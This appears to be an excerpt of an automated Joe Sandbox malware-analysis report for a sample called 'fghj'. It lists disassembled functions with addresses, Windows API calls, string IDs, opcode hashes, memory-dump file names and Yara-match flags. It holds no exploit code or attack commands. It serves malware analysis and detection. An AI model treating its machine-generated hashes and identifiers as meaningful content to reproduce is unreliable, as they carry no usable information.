                                                                                                                                                                                                                    • String ID: M$UN$^
                                                                                                                                                                                                                    • API String ID: 0-3025785885
                                                                                                                                                                                                                    • Opcode ID: 6202ab286e219dd05dd8e0361549bc1ef4dc499cab8f8d907c14e67f8aaae663
                                                                                                                                                                                                                    • Instruction ID: 1eb10c04c9a4afbb17cdbdf022d9cea95c46934d2362b2ef8208681d86017b0d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6202ab286e219dd05dd8e0361549bc1ef4dc499cab8f8d907c14e67f8aaae663
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD91FE715447118FC724CF28C891AA3B7F2FF9A360B59C49DC4964FBA1EB35A882CB40
                                                                                                                                                                                                                    Function 00B06455 Relevance: 3.3, Strings: 2, Instructions: 817COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0$8
                                                                                                                                                                                                                    • API String ID: 0-46163386
                                                                                                                                                                                                                    • Opcode ID: 4192dcd53447e487a8f4a093151d40fb371583c5f2e25379ac25cebd27e4a0d7
                                                                                                                                                                                                                    • Instruction ID: c073f83c23c609589d28f8d675cb8063d291232c437932c2902afa6687c6825e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4192dcd53447e487a8f4a093151d40fb371583c5f2e25379ac25cebd27e4a0d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E7223716083409FD714CF18C880BABBBE1EF98354F1489ADF9898B392D775D958CB92
                                                                                                                                                                                                                    Function 00B0E55A Relevance: 3.1, Strings: 2, Instructions: 598COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: {bcd$c
                                                                                                                                                                                                                    • API String ID: 0-3821666538
                                                                                                                                                                                                                    • Opcode ID: 8aa11a78d0e2622c538d7e039c09967632528a1ae3256386de57d5879407a74a
                                                                                                                                                                                                                    • Instruction ID: 737e88e8a6e7e01d9e2604dbd240e13fdabe654e5a905abbe88c5d02bdf88b9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa11a78d0e2622c538d7e039c09967632528a1ae3256386de57d5879407a74a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A02CEB15493D08BD332CF2588907EBBFE1EBDA300F184AACD4D95B292D7758506CB96
                                                                                                                                                                                                                    Function 003A693D Relevance: 3.1, APIs: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003A67A1: FreeLibrary.KERNEL32(?,00000000,003A6947,0000018C,00000000,00000000,003A6A0D,?,?,?,00000000,003A225E,00000000,0000018C,00000010,00000010), ref: 003A67BB
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,0000018C,00000000,00000000,003A6A0D,?,?,?,00000000,003A225E,00000000,0000018C,00000010,00000010,0000018C), ref: 003A6951
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000001), ref: 003A6963
                                                                                                                                                                                                                      • Part of subcall function 003A268F: ExitProcess.KERNEL32 ref: 003A2740
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressExitFreeLoadProcProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239403935-0
                                                                                                                                                                                                                    • Opcode ID: 04ca42cd943e30c66789f24d64af61ed46dd2bd530b33c84cfd183fa6b92e8b4
                                                                                                                                                                                                                    • Instruction ID: 72baf54e652b39696ee1b0b9d7c6ea8187cddc06b8f2d9ec80f4af873dcbd677
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04ca42cd943e30c66789f24d64af61ed46dd2bd530b33c84cfd183fa6b92e8b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 080192712603006BD626EB75CC97F6BB7DCDF86750F04891DF19A9B1D0CE79D9058A20
                                                                                                                                                                                                                    Function 00B234B5 Relevance: 3.0, Strings: 2, Instructions: 466COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 45$-/
                                                                                                                                                                                                                    • API String ID: 0-195032532
                                                                                                                                                                                                                    • Opcode ID: 6dc2b53c1c63793181e933c0dc0a9b2068da8d5bb93bc8943316a89247141794
                                                                                                                                                                                                                    • Instruction ID: bb700276fa8a1abeb35e9a735436b987120688b81b144dad5c3ef5fce04f9002
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dc2b53c1c63793181e933c0dc0a9b2068da8d5bb93bc8943316a89247141794
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7C147B2A043208BD714DF24D892A77B7E5EF91710F1984ACE88A9B391E63CDE05C752
                                                                                                                                                                                                                    Function 00B05B25 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )$IEND
                                                                                                                                                                                                                    • API String ID: 0-707183367
                                                                                                                                                                                                                    • Opcode ID: 555cc7c1c2296d19f0d3b3819417252b77b8350260042f249ca5be385440b7a4
                                                                                                                                                                                                                    • Instruction ID: 63cd6762b54c539c7def149682f313a10ebe4c0da57f2028cf01d60a7d94b3f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 555cc7c1c2296d19f0d3b3819417252b77b8350260042f249ca5be385440b7a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD19BB15087449FE720CF18C881B5BBBE4EB94344F14896DF9999B3C2D775E908CB92
                                                                                                                                                                                                                    Function 00B3B1B5 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /k?$3k?
                                                                                                                                                                                                                    • API String ID: 0-3999930788
                                                                                                                                                                                                                    • Opcode ID: 0843cfbe9e390bf993783db44ffd3dd139bbf432ce856de5fe3a4e3bf7717a86
                                                                                                                                                                                                                    • Instruction ID: 5982470e4519af2283809a95044c92f7553eb8a7977c20d30b3f55f283857c74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0843cfbe9e390bf993783db44ffd3dd139bbf432ce856de5fe3a4e3bf7717a86
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58515C356083208FDB209F6D8C80A6BBBE1FB96714F369AACD6C0A7219D771DC01C785
                                                                                                                                                                                                                    Function 00B1D768 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: st$(
                                                                                                                                                                                                                    • API String ID: 0-3235791767
                                                                                                                                                                                                                    • Opcode ID: 6dcb24c17ef77fba05aaf466c16c9998c004fe6cfb22230f4a772e8da64dd68a
                                                                                                                                                                                                                    • Instruction ID: b11053091e29d45683841ada1a3cefc0e5122cffa6ee9638ac4eff27ebaab7b4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dcb24c17ef77fba05aaf466c16c9998c004fe6cfb22230f4a772e8da64dd68a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD5133776152008BC318CF29C8916AAB3E3EFC5314F59D66DE4968B3E1EB74E901CB45
                                                                                                                                                                                                                    Function 003A4523 Relevance: 2.5, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,003A56F5,00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4529
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4530
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                    • Opcode ID: 0b35939eda80e063b111fb37b0477d5669ebcfa76a2c82c46827f26785fb268a
                                                                                                                                                                                                                    • Instruction ID: 8018b6aad7e5b4b0391f76595aa2b8cbb5cd0209a739b65d924c11d88a233af7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b35939eda80e063b111fb37b0477d5669ebcfa76a2c82c46827f26785fb268a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5B00275555200EBDE42ABE09E0DF0A7F7DBB45742F005545F349C5160CA75C454DB11
                                                                                                                                                                                                                    Function 00B4CB95 Relevance: 2.3, Strings: 1, Instructions: 1066COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                                                    • Opcode ID: 7d58ce99e14cd4456ae23e5809613514da7f6838dea5dcaaa26db1aac14b0b8b
                                                                                                                                                                                                                    • Instruction ID: 9652789439c0ee3df54ef55fd4a62b0711ec139943d75736c8bfe88e043a9e53
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d58ce99e14cd4456ae23e5809613514da7f6838dea5dcaaa26db1aac14b0b8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C72C530618B488FDB69DF28C8856B977E1FB98714F14466DE88BC7241DF34EA42DB81
                                                                                                                                                                                                                    Function 003A8010 Relevance: 2.0, APIs: 1, Instructions: 548libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                                    • Opcode ID: 1ead2702d2c871b70b828c374928a25ac9851d7000d29f187a61134c0772ee8a
                                                                                                                                                                                                                    • Instruction ID: c670f81e220510d90aaac2fbca36b1844ba47d49b548edfeb45fcd32191a59bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ead2702d2c871b70b828c374928a25ac9851d7000d29f187a61134c0772ee8a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8612F1379153218FC74BFFB5EC8712A3B6AEB93311B42862EE4029B572DF3855018A95
                                                                                                                                                                                                                    Function 003A774E Relevance: 2.0, APIs: 1, Instructions: 547COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: 5caf35f11ff5a4da511b8600435fd25165698c50024feaac6e25f8899c592db4
                                                                                                                                                                                                                    • Instruction ID: 461d1662f7f1cafe1f9e9af2a2f710b5ecf2f5b9f35e15414d02e38254ed8bc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5caf35f11ff5a4da511b8600435fd25165698c50024feaac6e25f8899c592db4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B121337D103218FD74BEF79EC8A55A37AAFB93314B46862EE442C71A5DB3854028B81
                                                                                                                                                                                                                    Function 003A7911 Relevance: 1.9, APIs: 1, Instructions: 440COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: 2dd3bd388136ed9c084dc6e8cad1395e3c729a25d1ae64dadd773a22b8ea6f2d
                                                                                                                                                                                                                    • Instruction ID: 1af4ac5b837667d9de3e7eee40bf08fb2ad358bb8af4e23db65704b7843f8614
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dd3bd388136ed9c084dc6e8cad1395e3c729a25d1ae64dadd773a22b8ea6f2d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F10437D103218FC74FEF79EC8A55A376AFB93305B46862EE442CB1A9DB3851018B81
                                                                                                                                                                                                                    Function 00B3B475 Relevance: 1.9, Strings: 1, Instructions: 679COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                    • API String ID: 0-1993550816
                                                                                                                                                                                                                    • Opcode ID: 09a8b75ec536dbca7a7376d9415b1fd9020d3604bca0648bee68539fa425c826
                                                                                                                                                                                                                    • Instruction ID: c9b6b50da4022de2e995725848d8e910a1f5f3868df451db10b842235cc8a147
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a8b75ec536dbca7a7376d9415b1fd9020d3604bca0648bee68539fa425c826
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A12D0746083418FD714CF28C891F2BBBE1EBD9314F258AACE6959729ADB31DC05CB52
                                                                                                                                                                                                                    Function 003A7998 Relevance: 1.9, APIs: 1, Instructions: 409COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: 0f1267a10b9dc5051697d67a66cb74a7e24b6d12e3d24b42ceb52d7a4fa268f1
                                                                                                                                                                                                                    • Instruction ID: c5f457c344514f3085040aa981c607f29a420899929dd62ab4738249b7dbe574
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f1267a10b9dc5051697d67a66cb74a7e24b6d12e3d24b42ceb52d7a4fa268f1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE11377D103218FC74FEF79EC9A65A376AFB93301B46862EE452C71A9DB3851018B81
                                                                                                                                                                                                                    Function 00B3F835 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: SRST
                                                                                                                                                                                                                    • API String ID: 0-1783897844
                                                                                                                                                                                                                    • Opcode ID: 0456384825ea4fa961126b819c69e5e2ee748957ec08dcab38542764cb961c65
                                                                                                                                                                                                                    • Instruction ID: 620a9c050cfb4fbdf62476f1e9bfc611912eaa2968f0d00345a98174b6e37010
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0456384825ea4fa961126b819c69e5e2ee748957ec08dcab38542764cb961c65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15872F083254FD7288E24D89167BB7E2EBD5314F29867DE8969B381DA34DC0587C1
                                                                                                                                                                                                                    Function 00B09B15 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                                    • API String ID: 0-2547889144
                                                                                                                                                                                                                    • Opcode ID: d0bdbfe23a4422e5c95eb81cae082a1d78068452bb9f91bbc8e8c257de933646
                                                                                                                                                                                                                    • Instruction ID: cbe32550e4d6ee9ba3522a5a5dcd5099b5c37c609dc1cb6982ee95b951a7e96b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0bdbfe23a4422e5c95eb81cae082a1d78068452bb9f91bbc8e8c257de933646
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D1DB71A087454BC719CE29D8D026ABFE2EBC1320F18CB6DE5E5473D6D7389D498B81
                                                                                                                                                                                                                    Function 00B16655 Relevance: 1.6, Strings: 1, Instructions: 394COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: B>
                                                                                                                                                                                                                    • API String ID: 0-1123492563
                                                                                                                                                                                                                    • Opcode ID: 784bd9279c87542a1bfe3a596d208e75cbe64a15f8c9e4cc0859b87d9ee11ca1
                                                                                                                                                                                                                    • Instruction ID: 6dc871d76c9898b3d9936e9d5229de3683e5adcfdce14e683c072566ea5f4d1d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 784bd9279c87542a1bfe3a596d208e75cbe64a15f8c9e4cc0859b87d9ee11ca1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 549104729083148BC724DF28C8916A7B3E1EF95324F09C56DEC998B391FB789945CB92
                                                                                                                                                                                                                    Function 00B0C405 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                    • Opcode ID: 7aa613b8427eb4ff8c6086c07544124af6a7eb668be6b9012f478a0f7f7bfeb7
                                                                                                                                                                                                                    • Instruction ID: d297d39325044b741e11fb7f2b617c7ead070d814176ecac48382816f1552ec5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aa613b8427eb4ff8c6086c07544124af6a7eb668be6b9012f478a0f7f7bfeb7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC1E37550C3508BD325CF68848126FBFE2EFD2314F188AACE8D59B381D775C9098B9A
                                                                                                                                                                                                                    Function 00B2D51A Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2?#2
                                                                                                                                                                                                                    • API String ID: 0-573533050
